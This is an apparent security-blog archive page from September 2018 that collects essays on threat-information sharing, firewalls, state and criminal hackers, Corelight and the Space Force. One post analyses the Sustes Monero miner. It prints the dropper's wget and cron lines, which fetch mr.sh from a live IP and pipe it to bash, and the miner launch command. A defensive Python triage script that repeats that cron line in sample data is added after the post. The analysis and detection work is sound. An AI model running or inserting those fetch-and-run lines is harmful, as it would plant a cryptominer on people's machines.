Monthly Archives: September 2018

Shouldn’t Sharing Cyber Threat Information Be Easy?

A recent article revealed that the United States government has gotten better at providing unclassified cyber threat information to the private sector. Law enforcement and intelligence organizations have greatly cut the time it takes to provide unclassified versions of cyber threat indicators (a term that can refer to a variety of technical data, including but not limited to IP addresses, malware samples and e-mail addresses) to the Department of Homeland Security (DHS) for prompt dissemination to the private sector. The process has traditionally been slow because the originating agency must first determine whether an indicator can be released without exposing sources and methods, per the article.

 

Speed in delivering pertinent threat information is certainly an improvement in a domain where attacks occur in seconds. A November 2017 report from the DHS Office of the Inspector General reviewed the actions DHS took during 2016 to fulfil the threat-indicator sharing mandated by the Cybersecurity Information Sharing Act of 2015. Per the report, although DHS had succeeded in classifying indicators and defensive measures, it still faced challenges in effectively sharing that information across the public and private sectors. The report advocated enhanced outreach and a cross-domain information processing solution.

 

One factor in the prompter release of indicators may be DHS's automated indicator sharing (AIS) capability, which was set to be updated and upgraded in 2018. AIS enables the exchange of cyber threat indicators between the Federal Government and the private sector at machine speed, and DHS uses it to disseminate such information directly to the organizations that have signed up for it. As of January 2018, more than 200 private sector and government entities had done so, though per the article it was believed that most were not using the information they received to automatically block hostile network traffic.

 

Information sharing continues to be an important endeavor between the public and private sectors, as such data greatly assists organizations' detection, mitigation, and remediation efforts. It is also a confidence-building measure that strengthens the relationship between private companies and a government that has been criticized for not doing an adequate job in cyber security. Much of this private sector outreach falls on DHS's National Cybersecurity and Communications Integration Center (NCCIC). Per its website, the NCCIC serves as the hub of the Department's information sharing activities, increasing awareness of vulnerabilities, incidents, and mitigations. The NCCIC's Cyber Information Sharing and Collaboration Program is the cornerstone on which public-private information sharing rests.

 

An April 2018 report by the Government Accountability Office (GAO) found that DHS needed to enhance its efforts to improve the security of the public and private sectors. Per the GAO findings, DHS had not developed most of the planned functionality for its National Cybersecurity Protection System information-sharing capability; moreover, “DHS did not always agree about whether notifications of potentially malicious activity had been sent or received, and agencies had mixed views about the usefulness of these notifications.”

 

It’s good to see bureaucratic red tape being reduced, especially since cyber threats are pervasive, ongoing, and quick. Any effort that reduces the time it takes to get information out of the classified realm and into the hands of the private sector is welcome: that sector has often been cited as owning approximately 85 percent of critical infrastructure, a target-rich environment that is increasingly attracting hostile actor interest. With only 200 customers signed up with DHS, however, such an undertaking is destined to spin its wheels. DHS seems to be making the right moves to improve cyber security, including the recent establishment of its new Risk Management Center. What is consistently lacking is getting private sector organizations on board, a critical component of information sharing. While it does not appear that the private sector can be mandated to participate, something needs to be done to get everyone on the same page, whether that be an articulate communications strategy, an incentive-based program, or some combination thereof. Regardless, DHS is demonstrating its commitment to bringing the private sector on board. When the private sector will finally accept the outstretched hand it has been given remains to be seen.

 

This is a guest post by Emilio Iasiello

The post Shouldn’t Sharing Cyber Threat Information Be Easy? appeared first on CyberDB.

Time to Ignite An Intellectual Spark at Microsoft Ignite 2018!

Folks,

This week, thousands of IT professionals, managers, CISOs and CIOs are in Orlando, attending, well, Microsoft Ignite 2018!

Image Courtesy Microsoft. Source: https://www.microsoft.com/en-us/ignite

Now, according to Microsoft's website, Microsoft Ignite has SOLD OUT. Great! There are 900+ sessions, 100+ instructor-led technology workshops, 60+ Microsoft Immersion workshops, and 50+ hands-on labs with access to expert proctors!


Did I mention that, of course, Microsoft's very own experts are also going to be there, and collectively they cover numerous vital areas such as Securing the Enterprise, Simplified IT Management, Identity, Access & Compliance, Enterprise Security, etc.


So, with over 1000 sessions, 1000s of attendees, access to "expert proctors", and 100s of Microsoft's very own IT experts, THERE MUST BE AT LEAST ONE PERSON AT MICROSOFT IGNITE who could answer A very SIMPLE QUESTION -


       Question - What's The World's Most Important Active Directory Security Capability?



Now, in case you're wondering why anyone, and in fact everyone, attending Microsoft Ignite should care about this question, it's because in a Microsoft Windows Server based IT infrastructure, NOT A SINGLE ONE of the numerous vital areas listed above, i.e. Securing the Enterprise, Simplified IT Management, Identity, Access & Compliance, Enterprise Security etc. etc., can be adequately addressed without FIRST ENSURING THE SECURITY of their foundational Active Directory deployments!


Guess what?!  I'm willing to bet that 99% of experts (let alone attendees) at Microsoft Ignite don't have a clue as to the answer!


Unbelievable, haan?! So much for a US $800 Billion company's "Sold Out" IT Conference, where 100s of world-renowned IT experts, including Microsoft's finest, were presenting, and where 1000s of IT professionals (including Domain Admins of most Fortune 100 companies) were attending, yet no one likely knows the answer to this most basic of Windows Security questions!


Er, what's that millennial lingo again? Ah yes,  OMG  LOL ROFL !

Doesn't anyone RTM today?  (They don't, and here's likely why.)


On a serious note, if anyone attending Microsoft Ignite 2018 (including Microsoft's own experts) knows the answer to this 1 question, be my guest and answer the question by leaving a comment at the end of that blog post, and you'll earn my respect.


If you don't know the answer, I highly recommend reading, one, two and three, because without knowing the answer to this 1 question (and without possessing this capability,) you cannot secure anything in an Active Directory based Windows network.


Best wishes,
Sanjay

Pardon the Absence, and Get Ready!

Folks,

Hello again. I trust this finds you all doing well. It has been a few weeks since I last blogged. I hope you'll pardon my absence.

Yes, I was supposed to answer a rather important question, in fact, possibly the world's most important cyber security question, for the whole world, back in July, but I had to postpone doing so, for a few good reasons, which I may reveal in days to come.

Let's just say that amongst other things (e.g. a rather interesting trip across the Atlantic), I was working on finalising a project that directly impacts cyber security worldwide today, you know, the kind of stuff that even James Bond doesn't have yet!



By the way, speaking of Mr. Bond, as you probably know, I'm a huge fan, so thought I'd share a catchy tune with you -



Oh, that project I was working on is almost over (i.e. RC1), so it's time for me to get back to blogging, and... well, get ready!

Best wishes,
Sanjay

Pentagon CIOs struggle with legacy tech, security. Sound familiar?

Patrick Flanders has been thinking a lot about IT modernization.

Flanders, CIO of the Defense Health Agency, is gearing up to consolidate control over the Pentagon's sprawling network of treatment centers, in the process centralizing a far-flung set of IT operations that raise a host of security and device-management considerations.

"As we grow and take over management and administration of these networks and these facilities, cyber really is at the top of my list for priorities," Flanders said during a recent panel discussion hosted by Federal News Radio.


Sustes Malware: CPU for Monero

Today I'd like to share a simple analysis of a fascinating threat that I call Sustes (you'll see where the name comes from in a bit).

Everybody knows the Monero cryptocurrency, and probably everybody knows that it is built on privacy, meaning it is not simple to determine a Monero wallet's balance. Sustes (mr.sh) is a nice example of pirate mining, and even if it's hard to gauge its magnitude, since the attacker built private pool proxies, I believe it's worth recording the wallet address and sharing IoCs for future protection. So, let's have a closer look at it.

Monero stops you trying to check wallet balance
Sustes doesn't infect victims by itself (it's not a worm); it is spread through exploitation and brute-force activity, with a special focus on IoT devices and Linux servers. The initial infection stage is a wget of http://192[.]99[.]142[.]226[:]8220/mr.sh run directly on the victim machine, followed by a simple /bin/bash mr.sh. mr.sh is a simple bash script that drops and executes additional software, with a bit of spice. The following code represents the mr.sh content as of today (the blog post date).


An initial connection check aims to take down competing software on the victim, deciding on the basis of specific IP addresses: it lists the connection table, extracts the PID of each connection (awk '{print $7}' | sed -e "s/\/.*//g" takes netstat's PID/Program name column and strips everything after the slash) and kills those processes outright (kill -9). The attacker's unwanted communications, i.e. the peers whose connections get their process killed, are the following:
  • 103[.]99[.]115[.]220  (Org:  HOST EDU (OPC) PRIVATE LIMITED,  Country: IN)
  • 104[.]160[.]171[.]94 (Org:  Sharktech  Country: USA)
  • 121[.]18[.]238[.]56 (Org:  ChinaUnicom,  Country: CN)
  • 170[.]178[.]178[.]57 (Org:  Sharktech  Country: USA)
  • 27[.]155[.]87[.]59 (Org:  CHINANET-FJ  Country: CN)
  • 52[.]15[.]62[.]13 (Org:   Amazon Technologies Inc.,  Country: USA)
  • 52[.]15[.]72[.]79 (Org:  HOST EDU (OPC) PRIVATE LIMITED,  Country: IN)
  • 91[.]236[.]182[.]1 (Org:  Brillant Auto Kft,  Country: HU)
A second check is on command-line arguments. Sustes greps the process list for configuration file names (for example wc.conf, wq.conf and wm.conf), then for software names such as sustes (here we go!), and kills everything that matches the grep. The script continues by assigning the dropping site (192[.]99[.]142[.]226:8220) to the variable f2 and later calls f2 with specific paths appended (for example /xm64 and wt.conf) in order to drop the crafted components. mr.sh then runs the dropped software with its configuration file as follows:

nohup $DIR/sustes -c $DIR/wc.conf > /dev/null 2>&1 &

mr.sh ends by installing a crontab entry that re-downloads and re-executes the script every minute:

crontab -l 2>/dev/null; echo "* * * * * $LDR http://192.99.142.226:8220/mr.sh | bash -sh > /dev/null 2>&1"

Following the analysis and extracting the configuration file from the dropping URL, we can observe the Monero wallet addresses and the Monero pools used by the attacker. The following wallets (W1, W2, W3) were found.

  • W1: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
  • W2: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
  • W3: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
A quick analysis of the Monero pools in use led me to believe the attacker built custom, private pool proxies (deployed on private infrastructure); for that reason I believe it would be worthwhile to monitor and/or block the following addresses:
  • 158[.]69[.]133[.]20 on port 3333
  • 192[.]99[.]142[.]249 on port 3333
  • 202[.]144[.]193[.]110 on port 3333 
The downloaded payload is named sustes and is a basic XMRig, the well-known open-source miner. In this scenario it is used to make money at the expense of computer users by abusing the infected machine to mine Monero, a cryptocurrency. The following image shows the usage strings as initial proof of which software this is.

XMRig proof 1

Many people are currently wondering what the sustes process draining a lot of their PC resources is (for example: here, here and here).... now we have an answer: it's an unwanted miner. :D

Hope you had fun


IoC
  • IP Address:
    • 103[.]99[.]115[.]220  (Org:  HOST EDU (OPC) PRIVATE LIMITED,  Country: IN)
    • 104[.]160[.]171[.]94 (Org:  Sharktech  Country: USA)
    • 121[.]18[.]238[.]56 (Org:  ChinaUnicom,  Country: CN)
    • 170[.]178[.]178[.]57 (Org:  Sharktech  Country: USA)
    • 27[.]155[.]87[.]59 (Org:  CHINANET-FJ  Country: CN)
    • 52[.]15[.]62[.]13 (Org:   Amazon Technologies Inc.,  Country: USA)
    • 52[.]15[.]72[.]79 (Org:  HOST EDU (OPC) PRIVATE LIMITED,  Country: IN)
    • 91[.]236[.]182[.]1 (Org:  Brillant Auto Kft,  Country: HU)
  • Custom Monero Pools:
    • 158[.]69[.]133[.]20:3333
    • 192[.]99[.]142[.]249:3333
    • 202[.]144[.]193[.]110:3333 
  • Wallets:
    • W1: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
    • W2: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
    • W3: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
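The behaviour mr.sh shows above (the crontab line that re-fetches the dropper every minute, the miner binary started with a wc.conf-style config, and the outbound connections to the private pool proxies on port 3333) maps directly onto host-side checks. The following Python is an added example, not code from the original post or from the malware author: it runs those checks over captured `crontab -l`, `ps -eo pid,comm,args` and `ss -tnp` output and emits iptables rules for the dropper and pool addresses listed in the IoC section. The sample captures are constructed, and the fetcher shown in the cron line (curl) is an assumption, since the post only shows it as $LDR.

```python
"""Host triage for the Sustes miner. Added example, not code from the original post."""
import re

# Indicators taken from the IoC list above.
DROPPER_HOST, DROPPER_PORT = "192.99.142.226", 8220
POOL_HOSTS = {"158.69.133.20", "192.99.142.249", "202.144.193.110"}
POOL_PORT = 3333
MINER_NAMES = {"sustes", "xmrig"}
MINER_CONFIGS = {"wc.conf", "wq.conf", "wm.conf", "wt.conf"}

_ADDR = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3}):(\d+)")
_PID = re.compile(r"pid=(\d+)")


def scan_crontab(crontab_text):
    """Lines that re-fetch mr.sh from the dropper and pipe it into bash (the persistence step)."""
    needle = "%s:%d/mr.sh" % (DROPPER_HOST, DROPPER_PORT)
    return [ln.strip() for ln in crontab_text.splitlines()
            if needle in ln and "bash" in ln and not ln.lstrip().startswith("#")]


def scan_processes(ps_text):
    """(pid, comm, args) for miner processes, or anything started with the miner's config files.

    Expects `ps -eo pid,comm,args` output; the header and malformed lines are skipped.
    """
    hits = []
    for ln in ps_text.splitlines():
        parts = ln.split(None, 2)
        if len(parts) < 3 or not parts[0].isdigit():
            continue
        pid, comm, args = int(parts[0]), parts[1], parts[2]
        if comm in MINER_NAMES or any(cfg in args for cfg in MINER_CONFIGS):
            hits.append((pid, comm, args))
    return hits


def scan_connections(ss_text):
    """(peer_ip, peer_port, pid) for sockets talking to the pool proxies on 3333 or to the dropper.

    Expects `ss -tnp` output: the second ip:port on a line is the peer, and the
    owning pid appears as pid=N in the Process column.
    """
    hits = []
    for ln in ss_text.splitlines():
        addrs = _ADDR.findall(ln)
        if len(addrs) < 2:
            continue
        peer_ip, peer_port = addrs[1][0], int(addrs[1][1])
        if (peer_ip in POOL_HOSTS and peer_port == POOL_PORT) or \
           (peer_ip, peer_port) == (DROPPER_HOST, DROPPER_PORT):
            m = _PID.search(ln)
            hits.append((peer_ip, peer_port, int(m.group(1)) if m else None))
    return hits


def block_rules():
    """iptables commands that drop egress to the dropper and to the pool proxies."""
    fmt = "iptables -A OUTPUT -d %s -p tcp --dport %d -j DROP"
    return [fmt % (DROPPER_HOST, DROPPER_PORT)] + \
           [fmt % (ip, POOL_PORT) for ip in sorted(POOL_HOSTS)]


def triage(crontab_text, ps_text, ss_text):
    """Run all three checks; an empty list in every slot means no Sustes indicators were found."""
    return {"persistence": scan_crontab(crontab_text),
            "processes": scan_processes(ps_text),
            "connections": scan_connections(ss_text)}


# Constructed sample captures (not real data) from a hypothetical infected host.
# The fetcher in the cron line is assumed to be curl; the post only shows it as $LDR.
CRONTAB_SAMPLE = """# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
* * * * * curl -fsSL http://192.99.142.226:8220/mr.sh | bash -sh > /dev/null 2>&1
"""
PS_SAMPLE = """  PID COMMAND COMMAND
    1 systemd /sbin/init
 1337 sustes  /tmp/sustes -c /tmp/wc.conf
 2048 nginx   nginx: worker process
"""
SS_SAMPLE = """State Recv-Q Send-Q Local Address:Port  Peer Address:Port  Process
ESTAB 0      0      10.0.0.5:41234      158.69.133.20:3333 users:(("sustes",pid=1337,fd=3))
ESTAB 0      0      10.0.0.5:52000      93.184.216.34:443  users:(("curl",pid=2100,fd=5))
"""

if __name__ == "__main__":
    for kind, findings in triage(CRONTAB_SAMPLE, PS_SAMPLE, SS_SAMPLE).items():
        print(kind, findings)
    print("\n".join(block_rules()))
```

Connections to the eight addresses that mr.sh itself kills are deliberately not flagged: those are rival miners the script evicts, so seeing them points to a different infection rather than to Sustes. The iptables rules are an ad-hoc response for a single host; the durable fix is removing the cron entry and the binary, and folding the dropper and pool addresses into the egress block list of the perimeter firewall or proxy.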

Firewalls and the Need for Speed

I was looking for resources on campus network design and found these slides (pdf) from a 2011 Network Startup Resource Center presentation. These two caught my attention:



This bothered me, so I Tweeted about it.

This started some discussion, and prompted me to see what NSRC suggests for architecture these days. You can find the latest, from April 2018, here. Here is the bottom line for their suggested architecture:






What do you think of this architecture?

My Tweet has attracted some attention from the high speed network researcher community, some of whom assume I must be a junior security apprentice who equates "firewall" with "security." Long-time blog readers will laugh at that, like I did. So what was my problem with the original recommendation, and what problems do I have (if any) with the 2018 version?

First, let's be clear that I have always differentiated between visibility and control. A firewall is a poor visibility tool, but it is a control tool. It controls inbound or outbound activity according to its ability to perform in-line traffic inspection. This inline inspection comes at a cost, which is the major concern of those responding to my Tweet.

Notice how the presentation author thinks about firewalls. In the slides above, from the 2018 version, he says "firewalls don't protect users from getting viruses" because "clicked links while browsing" and "email attachments" are "both encrypted and firewalls won't help." Therefore, "since firewalls don't really protect users from viruses, let's focus on protecting critical server assets," because "some campuses can't develop the political backing to remove firewalls for the majority of the campus."

The author is arguing that firewalls are an inbound control mechanism, and they are ill-suited for the most prevalent threat vectors for users, in his opinion: "viruses," delivered via email attachment, or "clicked links."

Mail administrators can protect users from many malicious attachments. Desktop anti-virus can protect users from many malicious downloads delivered via "clicked links." If that is your worldview, of course firewalls are not important.

His argument for firewalls protecting servers is, implicitly, that servers may offer services that should not be exposed to the Internet. Rather than disabling those services, or limiting access via identity or local address restrictions, he says a firewall can provide that inbound control.

These arguments completely miss the point that firewalls are, in my opinion, more effective as an outbound control mechanism. For example, a firewall helps restrict adversary access to his victims when they reach outbound to establish post-exploitation command and control. This relies on the firewall identifying the attempted C2 as being malicious. To the extent intruders encrypt their C2 (and sites fail to inspect it) or use covert mechanisms (e.g., C2 over Twitter), firewalls will be less effective.

The previous argument assumes admins rely on the firewall to identify and block malicious outbound activity. Admins might alternatively identify the activity themselves, and direct the firewall to block outbound activity from designated compromised assets or to designated adversary infrastructure.

As some Twitter responders said, it's possible to do some or all of this without using a stateful firewall. I'm aware of the cool tricks one can play with routing to control traffic. Ken Meyers and I wrote about some of these approaches in 2005 in my book Extrusion Detection. See chapter 5, "Layer 3 Network Access Control."

Implementing these non-firewall-based security choices requires a high degree of diligence, which in turn requires visibility. I did not see this emphasized in the NSRC presentation. For example:


These are fine goals, but I don't equate "manageability" with visibility or security. I don't think "problems and viruses" captures the magnitude of the threat to research networks.

The core of the reaction to my original Tweet is that I don't appreciate the need for speed in research networks. I understand that. However, I can't understand the requirement for "full bandwidth, un-filtered access to the Internet." That is a recipe for disaster.

On the other hand, if you define partner specific networks, and allow essentially site-to-site connectivity with exquisite network security monitoring methods and operations, then I do not have a problem with eliminating firewalls from the architecture. I do have a problem with unrestricted access to adversary infrastructure.

I understand that security doesn't exist to serve itself. Security exists to enable an organizational mission. Security must be a partner in network architecture design. It would be better to emphasize enhanced monitoring for the networks discussed above, and to think carefully about enabling speed without restrictions. The NSRC resources on the science DMZ merit consideration in this case.

Top 10 GRC mistakes — and how to avoid them

Governance, risk and compliance (GRC) — the very words cause groans among employees and leadership alike. They conjure thoughts of expansive spreadsheets and endless meetings where acronyms like KRIs and KPIs are bandied about. Quite often, GRC exercises are seen as a waste of time or the purview of the CFO and internal audit.

But this is not the case. With regulatory obligations and penalties for non-compliance increasing, CIOs and IT leadership must push for effective risk management, compliance and governance within their organizations. These efforts involve areas are separate from IT (for example, legal and finance) but are nonetheless critical for a GRC program’s effectiveness.



“Your Secure DevOps Questions Answered”

As SANS prepares for the 2nd Annual Secure DevOps Summit, Co-Chairs Frank Kim and Eric Johnson are tackling some of the common questions they get from security professionals who want to understand how to inject security into the DevOps pipeline, leverage leading DevOps practices, and secure DevOps technologies and cloud services. If you are …

State Actor Cyber Reports Overshadow the Extensive Threat of Cyber Crime

There has been recent focus on alleged Iranian cyber activity over the past few weeks, spurred on by the publication of a vendor report on Iranian operations. Per the vendor’s findings, not only was Iran likely behind activity targeting government and private sector entities in the Middle East, it was using National Security Agency exploits that had been stolen and dumped into the public domain by the Shadow Brokers group in April 2017. As recently as late August 2018, Iran was suspected of trying to launch influence operations ahead of the midterm elections. The conclusion is that Iran is increasingly using asymmetric attacks, particularly via cyberspace, as part of its toolbox for conducting retaliatory attacks.

The new reporting comes at a time when Russia’s cyber malfeasance has largely dominated the press, due to its influence operations and election shenanigans, not just in the United States but in other countries as well. Prior to the Russia focus, North Korea was the focal point with its suspected cyber activities targeting cryptocurrency, and SWIFT banking transactions before that. Iran was propelled onto the scene with the Operation Ababil DDoS attacks against U.S. banks, as well as its suspected involvement in the wiper malware incident against Saudi Aramco. Some consider Iran a powerful cyber nation on par with, or close to, China and Russia. Others maintain that Iranian actors are much less sophisticated, preferring to implement “tried-and-true tactics while targeting many individuals.” China initially led state cyber espionage activity, which was largely curbed against the United States once the “no hack” pact was agreed to in 2015.

There seems to be a perpetual “revolving door” of news-cycle focus on suspected state activity, with new reports covering hostile espionage and exploitation against global targets. Their purpose appears to be tracking the latest and greatest escapades of these governments, which in most cases use publicly available tools and exploits (see Shadow Brokers above) and vectors that are routine for any hostile cyber actor (certainly, if a state actor is “sophisticated,” the implication is that its activity hasn’t been detected yet, or its sophisticated tools and exploits haven’t been deployed yet).

Between the ongoing stories of adversarial state activity and news of smaller nations looking to acquire offensive cyber capabilities, all indications are that media and vendor reporting will continue to push the “hostile state actor as monolith” narrative into the public eye. Yet, as the saying goes, “if everything is important, nothing is important,” which rings true with regard to state cyber activity. Actual activity or incidents that threaten to disrupt, destroy, degrade, deny, or manipulate data systems or the data resident on them deserve to be pushed to the forefront, as they potentially impact everyone at all levels.

But theft of intellectual property and state secrets affects a minority, and rarely if ever impacts everyday citizens. The same vigorous scrutiny and analysis applied to suspected state activity should be applied to the cyber crime ecosystem, whose nefarious endeavors directly impact the global population. And while there are isolated instances of law enforcement arresting groups and individuals or taking down marketplaces, this has failed to put a dent in a global industry whose activity was cited as the second most reported economic crime, according to a 2017 report by the same vendor.

This needs to change, and it would be welcome to see vendors with wide and deep visibility into the cyber threat space, who can uncover some of the more “sophisticated” state actors, apply that precision against a threat intent on exploiting everyone on the planet. Some of the more notable breaches have exposed a high volume of individual data:

Year      Organization                  Records exposed
2013/14   Yahoo                         3 billion accounts
2016      Adult Friend Finder           412 million accounts
2014      eBay                          145 million users
2017      Equifax                       143 million users
2008      Heartland Payment Systems     134 million credit cards

One thing is clear: cyber criminals have proven to be as sophisticated and resourceful as state actors, oftentimes using the same tools and techniques. It is disappointing that this category of cyber actor is not tracked as robustly, with information shared directly with the appropriate authorities.

 

This is a guest post by Emilio Iasiello

The post State Actor Cyber Reports Overshadow the Extensive Threat of Cyber Crime appeared first on CyberDB.

Twenty Years of Network Security Monitoring: From the AFCERT to Corelight

I am really fired up to join Corelight. I’ve had to keep my involvement with the team a secret since officially starting on July 20th. Why was I so excited about this company? Let me step backwards to help explain my present situation, and forecast the future.

Twenty years ago this month I joined the Air Force Computer Emergency Response Team (AFCERT) at then-Kelly Air Force Base, located in hot but lovely San Antonio, Texas. I was a brand new captain who thought he knew about computers and hacking based on experiences from my teenage years and more recent information operations and traditional intelligence work within the Air Intelligence Agency. I was desperate to join any part of the then-five-year-old Information Warfare Center (AFIWC) because I sensed it was the most exciting unit on “Security Hill.”

I had misjudged my presumed level of “hacking” knowledge, but I was not mistaken about the exciting life of an AFCERT intrusion detector! I quickly learned the tenets of network security monitoring, enabled by the custom software watching and logging network traffic at every Air Force base. I soon heard there were three organizations that intruders knew to be wary of in the late 1990s: the Fort, i.e. the National Security Agency; the Air Force, thanks to our Automated Security Incident Measurement (ASIM) operation; and the University of California, Berkeley, because of a professor named Vern Paxson and his Bro network security monitoring software.

When I wrote my first book in 2003-2004, The Tao of Network Security Monitoring, I enlisted the help of Christopher Jay Manders to write about Bro 0.8. Bro had the reputation of being very powerful but difficult to stand up. In 2007 I decided to try installing Bro myself, thanks to the introduction of the “brolite” scripts shipped with Bro 1.2.1. That made Bro easier to use, but I didn’t do much analysis with it until I attended the 2009 Bro hands-on workshop. There I met Vern, Robin Sommer, Seth Hall, Christian Kreibich, and other Bro users and developers. I was lost most of the class, saved only by my knowledge of standard Unix command line tools like sed, awk, and grep! I was able to integrate Bro traffic analysis and logs into my TCP/IP Weapons School 2.0 class, and subsequent versions, which I taught mainly to Black Hat students. By the time I wrote my last book, The Practice of Network Security Monitoring, in 2013, I was heavily relying on Bro logs to demonstrate many sorts of network activity, thanks to the high-fidelity nature of Bro data.

In July of this year, Seth Hall emailed to ask if I might be interested in keynoting the upcoming Bro users conference in Washington, D.C., on October 10-12. I was in a bad mood due to being unhappy with the job I had at that time, and I told him I was useless as a keynote speaker. I followed up with another message shortly after, explained my depressed mindset, and asked how he liked working at Corelight. That led to interviews with the Corelight team and a job offer. The opportunity to work with people who really understood the need for network security monitoring, and were writing the world’s most powerful software to generate NSM data, was so appealing! Now that I’m on the team, I can share how I view Corelight’s contribution to the security challenges we face.

For me, Corelight solves the problems I encountered all those years ago when I first looked at Bro. The Corelight embodiment of Bro is ready to go when you deploy it. It’s developed and maintained by the people who write the code. Furthermore, Bro is front and center, not buried behind someone else’s logo. Why buy this amazing capability from another company when you can work with those who actually conceptualize, develop, and publish the code?

It’s also not just Bro, but Bro at ridiculous speeds, ingesting and making sense of complex network traffic. We regularly encounter open source Bro users who spend weeks or months struggling to get their deployments to run at the speeds they need, typically in the tens or hundreds of Gbps. Corelight’s offering is optimized at the hardware level to deliver the highest performance, and our team works with customers who want to push Bro to even greater levels.

Finally, working at Corelight gives me the chance to take NSM in many exciting new directions. For years we NSM practitioners have worried about challenges to network-centric approaches, such as encryption, cloud environments, and alert fatigue. At Corelight we are working on answers for all of these, beyond the usual approaches — SSL termination, cloud gateways, and SIEM/SOAR solutions. We will have more to say about this in the future, I’m happy to say!

What challenges do you hope Corelight can solve? Leave a comment or let me know via Twitter to @corelight_inc or @taosecurity.

Is the Space Force Necessary? If Done Correctly, Yes

Space Force picture, an independent military branch by 2020. The move is designed to counter the weapons that China and Russia have already developed that threaten U.S. satellites. The U.S. Vice President quickly assured that the force would not be created from the ground up, but would leverage the personnel and material resources already existing in the service elements. The goal is to streamline efforts and maximize efficiency, a noble endeavor given the difficulties that invariably arise when mission responsibilities traverse and overlap so many different organizations.

 

The protection of U.S. civilian and military space assets is considered a national security concern. In December 2017, U.S. Department of Defense officials expressed concern that the United States’ anti-satellite capabilities were not on par with those of some of its adversaries. In contrast, adversary adoption of anti-satellite weapons has been documented in the news. In April 2018, a report detailing global counterspace capabilities (which include direct-ascent weapons, co-orbital weapons, directed energy, electronic warfare, and cyber warfare) underscored how adversarial nations are actively pursuing the development of such weapons and the threat they pose to U.S. space interests. The report reveals that such investment by these states started in the mid-2000s.

Take into consideration the Global Positioning System (GPS).  This breakthrough technology has perhaps caused an over-reliance on GPS, to our detriment.  The military and civilian sectors rely on satellites for a variety of purposes that support communication, navigation, weather, tracking movement, precision weapon deployment, and the conduct of surreptitious surveillance.

Unsurprisingly, there is much criticism being applied to the force.  Some see the Space Force as a frivolous symbolic demonstration of U.S. power; others see the capability as already existing in the Air Force’s Space Command; and still others stress the need for a cyber force instead (even after the elevation of U.S. Cyber Command to a fully functional combatant command).  What all of these criticisms have in common is that they don’t see the need for organizing U.S. space capabilities to better prepare for the threats that exist now or, more importantly, those that are coming down the road.  This sort of thinking has traditionally impacted readiness in terrorism and cyberspace.

Having aggressive acts move to space should not come as a surprise to the doubters.  Few thought that cyberspace would be exploited to the degree that it is now, as evidenced by how advancements in IT have evolved without security considerations being built into the technology.  And now our reality is to perpetually play catch-up in securing our cyber postures, an endeavor seemingly so insurmountable that there is an increasing preference to commit to offensive cyber activity as a first line of defense and as a deterrent.  It is obvious that no one prepared well for how cyberspace could and did evolve.

Now apply that school of thought to space.  As states continue to develop counterspace capabilities, is it really so foolhardy to aggressively position the United States with a dedicated body to monitor and track current and future threats?  It took Cyber Command nearly a decade to become operational and staffed, truly cringe-worthy considering the speed with which attacks happen in the digital domain.  Would we want to repeat the same mistakes with space?

A Space Force needs to be established in the right way.  Thus far, as evidenced in the remarks made by the Vice President, consolidation and the development of specific, non-overlapping roles and responsibilities are essential to ensuring that mission objectives are clear and that the multiple parts work together to ensure every goal is met.  Current stakeholders must all be brought under one roof.  There can’t be a space-dedicated office or entity in every major government body.

Anything short of that risks creating another unnecessary bureaucratic entity in an over-bloated ecosystem.

Moreover, establishing a Space Force sends a message to our enterprising adversaries that demonstrates U.S. resolve not to be caught behind the proverbial eight-ball again.  The U.S. has the capability and the material, financial, and personnel resources to ensure its right to operate in space without interference.  That is especially important in the context of Russian election meddling, troll farms, and suspected Russian hacking of critical infrastructure.  Critics have pointed out that the U.S. has not done enough in cyberspace to demonstrate its resolve not to allow unacceptable behavior to transpire.

But the U.S. doesn’t necessarily have to kinetically or non-kinetically strike an adversary to achieve the intended outcome.  The White House may benefit from taking a play from former U.S. President Ronald Reagan.  At the height of its nuclear arms race with the Soviets in the 1980s, the United States embarked on developing its Strategic Defense Initiative – the “Star Wars” missile defense program.  Star Wars was designed to protect the United States from attack by ballistic strategic nuclear weapons.  Competition to keep up with the United States proved too difficult, forcing Russia to offer to shrink its nuclear arsenal in exchange for Star Wars’ cancellation.

Is this the game plan now?  Perhaps.  The U.S. economy is strong while Russia’s has been stagnant and China’s is cooling as investment growth hits a record low.  Or it could just be the United States planning for the future.  Either way, a gambit is being played.  And now that the Space Force is official, the players are taking notice and trying to figure out their next move.

This is a guest post by Emilio Iasiello

The post Is the Space Force Necessary? If Done Correctly, Yes appeared first on CyberDB.